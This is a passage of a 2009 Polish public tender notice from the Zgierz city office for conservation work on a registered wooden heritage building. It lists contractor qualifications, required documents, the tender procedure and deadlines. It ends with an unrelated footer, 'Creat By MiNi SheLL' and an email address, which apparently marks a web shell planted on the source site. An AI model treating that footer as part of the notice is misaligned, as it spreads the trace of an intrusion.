Wykonawcy, którzy potwierdzą, że: - posiadają wymagane uprawnienia do wykonywania określonej (właściwej dla realizacji przedmiotu niniejszego zamówienia) działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; - wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania 
         o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
          w tym okresie, co najmniej 1 robotę budowlaną, odpowiadającą swoim 
         rodzajem (tj. roboty restauratorskie i konserwatorskie budownictwa drewnianego
         wpisanego w rejestr zabytków) robotom budowlanym stanowiącym przedmiot zamówienia,
         o wartości nie mniejszej niż  500 000,00 zł, potwierdzone załączonymi dokumentami
         (np. referencjami), że roboty te zostały wykonane należycie;
           UWAGA: Zamawiający uzna :
                             a) tę liczbę zamówień, która wynika bezpośrednio z powyższego warunku, jak również
                             b) liczbę zamówień wynikającą pośrednio, jako iloraz sumy wartości zamówień 
                                 odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot
                                 zamówienia przez wartość niniejszego zamówienia ;
 - dysponują lub będą dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (w szczególności - posiadającymi wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień), tj.  -  kierownika budowy posiadającego kwalifikacje o których mowa w § 8, ust. 1
     Rozporządzenia Ministra Kultury z dnia 9.06.2004r. w sprawie prowadzenia prac 
     konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich 
     i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków 
     oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych
     / Dz.U.z 2004r Nr 150, poz.1579 z późniejszymi zmianami/,
 -   konserwatora drewnianego detalu i elementu architektonicznego, posiadającego odpowiednie
     przygotowanie (kwalifikacje) i doświadczenie, określone w Rozporządzeniu Ministra Kultury 
     z dnia  9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, 
     robót budowlanych, badań konserwatorskich i architektonicznych a także innych działań 
     przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004r. nr 150, poz. 1579);


 - są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej 
           działalności gospodarczej - odpowiadającym przedmiotowi niniejszego zamówienia,
           na kwotę: 500 000,00 zł . 
UWAGA: Warunek nie podlega ocenie na etapie oceny złożonej oferty; jego spełnienie będzie 
                           wymagane przed zawarciem umowy z Wykonawcą, którego oferta zostanie wybrana. 
Ocena spełniania warunków wymaganych od Wykonawców będzie dokonana na podstawie niżej wymienionych oświadczeń i dokumentów wg kryterium: spełnia - nie spełnia, przy czym niespełnienie warunków udziału w postępowaniu skutkuje wykluczeniem Wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, a w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - oświadczenie Podmiotu Składowego o spełnianiu warunków udziału w postępowaniu podpisane odrębnie przez każdy podmiot składowy oraz, dodatkowo: - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający uzna za dokument wystawiony w wymaganym terminie również kopię tego dokumentu, wystawioną wcześniej, ale potwierdzoną w wymaganym terminie, odnośnie jej aktualności, przez organ wydający (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany odrębnie przez każdy podmiot składowy); - wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany wspólnie); - pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wyżej wymienionym wykazie Wykonawca wskazał osoby, którymi będzie dysponował (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany wspólnie); - dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, przy czym dla robót budowlanych - w szczególności - zaświadczenie potwierdzające wpis na listę członków właściwej izby samorządu zawodowego (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany wspólnie); - wykaz robót budowlanych, wykonanych w okresie ostatnich 5 lat przed dniem 
                wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia 
                działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
                i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem
                ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
                potwierdzających, że roboty te zostały wykonane należycie
 (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany wspólnie); - polisa, a w przypadku jej braku - inny dokument potwierdzający, że Wykonawca
                jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej 
                działalności gospodarczej - dokument nie wymagany jako załącznik do oferty; wymagany przed zawarciem
                      umowy z Wykonawcą, którego oferta zostanie wybrana (aktualny przez cały 
                      okres trwania umowy). 

Dodatkowo, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia - w szczególności - do podpisania oferty wraz z załącznikami - złożone w formie oryginału, kopii (odpisu, wypisu) potwierdzonej przez udzielającego pełnomocnictwa lub kopii (odpisu, wypisu) poświadczonej przez notariusza. UWAGA I: Podmioty wspólnie ubiegające się o udzielenie zamówienia winny złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę, np. z umowy konsorcjum. Pełnomocnictwo to powinno wskazywać wszystkie podmioty, które wspólnie ubiegają się o udzielenie zamówienia publicznego, a także zawierać deklarację wszystkich uczestników konsorcjum co do ustanowienia pełnomocnika. UWAGA II: Spółka cywilna ubiegająca się o udzielenie zamówienia nie ma obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników - każdego wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu cywilnego, chyba że umowa lub uchwała wspólników stanowi odmiennie. UWAGA III: Umowa regulująca współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (umowa konsorcjum) będzie wymagana przed zawarciem umowy, jeżeli oferta tych Wykonawców zostanie wybrana.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.umz.zgierz.pl/przetargi/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgierza, 95-100 Zgierz, Plac Jana Pawła II 16, pokój nr 203, za cenę 169.39 PLN (wpłata w pokoju nr 014) lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2009 godzina 11:45, miejsce: Urząd Miasta Zgierza, 95-100 Zgierz, Plac Jana Pawła II 16, pokój nr 105.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 08.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com